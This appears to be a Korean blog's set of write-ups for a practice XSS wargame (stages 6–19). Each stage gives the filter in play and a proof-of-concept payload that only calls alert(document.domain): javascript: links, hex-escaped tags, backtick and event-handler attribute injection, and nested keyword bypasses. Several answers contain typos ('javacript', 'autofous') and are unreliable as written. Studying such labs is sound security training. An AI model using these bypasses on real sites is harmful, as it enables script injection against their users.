Stage #19


풀이

더보기

href에 자바스크립트를 넣으면 풀린다.

javacript:alert(document.domain)

정답

 javacript:alert(document.domain)

 

 

 

XSS Challenges CLEAR!!

 

 

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #15  (0) 2020.11.21
[XSS Challenges] Stage #12  (0) 2020.11.19
[XSS Challenges] Stage #10  (0) 2020.11.19
[XSS Challenges] Stage #9  (1) 2020.11.19
[XSS Challenges] Stage #8  (0) 2020.11.19

Stage #15


풀이

더보기

document.write()는 자바스크립트 출력물이다.

 

Stage #15는 <>를 필터링하고 있지만 document.write()는 \x3c,\x3e를 <>로 해석한다.

console 출력 결과

 이를 이용하여 스크립트를 작성한다.

정답

  \\x3cimg src=1 onerror=alert(document.domain)\\x3e

 

 

 

 

 

 

 

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #19  (0) 2020.11.21
[XSS Challenges] Stage #12  (0) 2020.11.19
[XSS Challenges] Stage #10  (0) 2020.11.19
[XSS Challenges] Stage #9  (1) 2020.11.19
[XSS Challenges] Stage #8  (0) 2020.11.19

Stage #12


풀이

더보기

힌트를 보자

<>"'를 필터링하는 것을 알 수 있다.

 

<>"를 사용하지 않고 XSS를 실행시켜야한다.

<>는 STAGE 6번을 이용하면 사용하지 않을 수 있지만 "를 사용을 안 할 수는 없다.

 

IE에서는 " 대신 숫자키[1] 옆에있는 `을 사용할 수 있다.

IE에서 다음과 같은 스크립트를 입력한다.

 

정답

 ` ` onfocus= alert(document.domain); autofous

 

 

 

 

 

 

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #19  (0) 2020.11.21
[XSS Challenges] Stage #15  (0) 2020.11.21
[XSS Challenges] Stage #10  (0) 2020.11.19
[XSS Challenges] Stage #9  (1) 2020.11.19
[XSS Challenges] Stage #8  (0) 2020.11.19

Stage #10

 


 

풀이

더보기

domain이란 문자열을 제거하고 있다.

 

domain 문자열 사이에 domain문자를 남기면 필터링 된 후 domain이라는 문자만 남는다.

 ex) do(domain)main

 

정답

"><script>alert(document.dodomainmain);</script>

 

 

 

 

 

 

 

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #15  (0) 2020.11.21
[XSS Challenges] Stage #12  (0) 2020.11.19
[XSS Challenges] Stage #9  (1) 2020.11.19
[XSS Challenges] Stage #8  (0) 2020.11.19
[XSS Challenges] Stage #7  (0) 2020.11.19

Stage # 9


풀이

더보기

UTF-7을 인코딩을 이용하여 푸는 문제다.

UTF-7이란 메일 시스템이 아스키 값으로 전송 되니때문에 이를 해결하기위하여 모든 문자를 아스키코드로 변환하하는 것이다.

 

이를 이용하여 XSS 스크립트문을 UTF-7으로 변경하고 인코딩된 스크립트문을 실행하면 풀어진다.

 

현재 chrome, IE, FireFox는 UTF-7을 지원하지 않으므로 풀 수가 없었다. ㅡ.ㅡ

 

 

 

 

 

 

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #12  (0) 2020.11.19
[XSS Challenges] Stage #10  (0) 2020.11.19
[XSS Challenges] Stage #8  (0) 2020.11.19
[XSS Challenges] Stage #7  (0) 2020.11.19
[XSS Challenges] Stage #6  (0) 2020.11.17

Stage #8


풀이

더보기

URL을 입력하면 링크를 만들어준다.

href값이 들어간 경우 Javasript:를 사용하면 자바스크립트가 실행된다.

정답 :

Javascript:alert(document domain);

 

 

 

 

 

 

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #10  (0) 2020.11.19
[XSS Challenges] Stage #9  (1) 2020.11.19
[XSS Challenges] Stage #7  (0) 2020.11.19
[XSS Challenges] Stage #6  (0) 2020.11.17
[XSS Challenges] Stage #5  (0) 2020.11.17

Stage # 7

 


풀이

더보기

7번 

6번문제에 "가 추가적으로 필터가 된다.

"><script>alert(document.domain)</script> 를 입력해보았다.

<>"가 필터링되어 XSS가 실행 되지않는다.


<>가 &gl,&lt로 필터링된다

<>"를 사용하지 않고 XSS를 실행 시켜야 한다.

 

6번이랑 정답이 똑같다.

XSS에 "를 사용하지 않았으므로 6번이랑 정답이 똑같다.

event handler를 사용하면 할 수 있다. 

" onfocus =alert(document.domain); autofocus

REF

portswigger.net/web-security/cross-site-scripting/cheat-sheet

 

Cross-Site Scripting (XSS) Cheat Sheet - 2020 Edition | Web Security Academy

Interactive cross-site scripting (XSS) cheat sheet for 2020, brought to you by PortSwigger. Actively maintained, and regularly updated with new vectors.

portswigger.net

 

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #9  (1) 2020.11.19
[XSS Challenges] Stage #8  (0) 2020.11.19
[XSS Challenges] Stage #6  (0) 2020.11.17
[XSS Challenges] Stage #5  (0) 2020.11.17
[XSS Challenges] Stage #4  (0) 2020.11.17

Stage # 6


풀이

더보기

6번 

"><script>alert(document.domain)</script> 를 입력해보았다.

<>가 필터링되어 XSS가 실행 되지않는다.

<>가 &gl,&lt로 필터링된다

<>를 사용하지 않고 XSS를 실행 시켜야 한다.

event handler를 사용하면 할 수 있다. 

" onfocus =alert(document.domain); autofocus

 

REF

portswigger.net/web-security/cross-site-scripting/cheat-sheet

 

Cross-Site Scripting (XSS) Cheat Sheet - 2020 Edition | Web Security Academy

Interactive cross-site scripting (XSS) cheat sheet for 2020, brought to you by PortSwigger. Actively maintained, and regularly updated with new vectors.

portswigger.net

 

 

 

 

 

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #8  (0) 2020.11.19
[XSS Challenges] Stage #7  (0) 2020.11.19
[XSS Challenges] Stage #5  (0) 2020.11.17
[XSS Challenges] Stage #4  (0) 2020.11.17
[XSS Challenges] Stage #3  (0) 2020.11.17

+ Recent posts